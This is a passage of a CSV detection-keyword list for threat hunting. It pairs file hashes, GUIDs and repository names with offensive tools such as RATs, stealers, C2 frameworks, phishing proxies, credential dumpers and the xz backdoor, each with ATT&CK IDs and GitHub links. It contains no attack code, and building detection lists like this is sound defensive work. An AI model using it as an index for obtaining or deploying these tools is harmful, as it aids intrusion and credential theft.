tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596*",".{0,1000}d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*",".{0,1000}d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef*",".{0,1000}d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391*",".{0,1000}d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82*",".{0,1000}d39ee3711191ba35873ecaf10a0fec4d1bc80bc31a6718e2954f6f4400075d82.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*d3ckx1/Crack-allDBs*",".{0,1000}d3ckx1\/Crack\-allDBs.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*D3CrYP7V41U3(*",".{0,1000}D3CrYP7V41U3\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*D3E7005E-6C5B-47F3-A0B3-028C81C0C1ED*",".{0,1000}D3E7005E\-6C5B\-47F3\-A0B3\-028C81C0C1ED.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330*",".{0,1000}d3e8378618c05eab2159113af6737a1c6b49f982ebe2eb1ab7e9b52e5ce1b330.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8*",".{0,1000}d3fcbfcd8d9ca33ba19dffbcc8d5de2f8ef18baa028e41eded243a84d496e8d8.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*d3lb3@protonmail.com*",".{0,1000}d3lb3\@protonmail\.com.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*D3m0n1z3dShell-main*",".{0,1000}D3m0n1z3dShell\-main.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806*",".{0,1000}d423b1efdaf4f11171e6daf6e096e3651210cc454ccd6bb65ac07fd0aa0d7806.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce*",".{0,1000}d43a9a1559ceb6fa1906b0142c375b8d2fa52e3725df36ec795cb0e734e110ce.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3*",".{0,1000}d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3","10","10","N/A","N/A","N/A","N/A" "*d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209*",".{0,1000}d4915417cd9c0127ed93470e8d07076540b1c7ac08162831d74ce2114fd7f209.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d494a4bc-3867-436a-93ef-737f9e0522eb*",".{0,1000}d494a4bc\-3867\-436a\-93ef\-737f9e0522eb.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556*",".{0,1000}d4962bf59508b527bd83622e1f05a95e3f26f2d7583052744e3d8dcdd08c4556.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c*",".{0,1000}d49db978a24cbafd9e310593896fb6df6b9360170ca1d80ce99231e02848df6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932*",".{0,1000}d4bc21da22b767a22840c442dd56536e0e5ab05932aa82899a43c29d49352932.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0*",".{0,1000}d4c38a6655fc0b8d8099d46fa13442101085a999199baaa0440068f2d3b982e0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a*",".{0,1000}d4d156e6c11c5f257643a6cebfebcbc7c06b93bec236112ecd7df8e82f63846a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391*",".{0,1000}d4d82865304b28c413e0127789f79a4dc49a498782f840b3e2421e8429c66391.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638*",".{0,1000}d4e30598f12b58bb8f2df1b7899cfe35435e183517b941b721b1a70806808638.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45*",".{0,1000}d4e30d80e0d2e1884270c75a2d13df486b54d0622925daaffa7ec78c942e3d45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D4stiny/ForkPlayground*",".{0,1000}D4stiny\/ForkPlayground.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*D4Vinci*",".{0,1000}D4Vinci.{0,1000}","offensive_tool_keyword","Github Username","Github user: A hacker. high&low-level coder and a lot of things between. An extremely curious creature loves to learn. Break things or make things that break things.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23*",".{0,1000}d533a9a5a4b19deed391457a2194f896560cd4fc021341750071389b6042bc23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7*",".{0,1000}d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77*",".{0,1000}d546105ee91da0a53a26ed53f90414ea5f56a272caa137629125d018354f6b77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a*",".{0,1000}d54be2853d3b9d6245f57221d3abc3d49984322693b450f455570b0e6ae8524a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985*",".{0,1000}d5591f81fb5bd90d3af0954008ecfd433eeaf6ecc99941324747ca7433ae5985.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452*",".{0,1000}d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8*",".{0,1000}d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc*",".{0,1000}d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285*",".{0,1000}d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*D5C4F5A2-5713-4A0A-A833-F9466AE5A339*",".{0,1000}D5C4F5A2\-5713\-4A0A\-A833\-F9466AE5A339.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58*",".{0,1000}d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794*",".{0,1000}d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68*",".{0,1000}d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9*",".{0,1000}d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809*",".{0,1000}d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*d67c342b9ffebd2350cb81d6dbbb35071246fb19*",".{0,1000}d67c342b9ffebd2350cb81d6dbbb35071246fb19.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522*",".{0,1000}d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c*",".{0,1000}d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9*",".{0,1000}d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 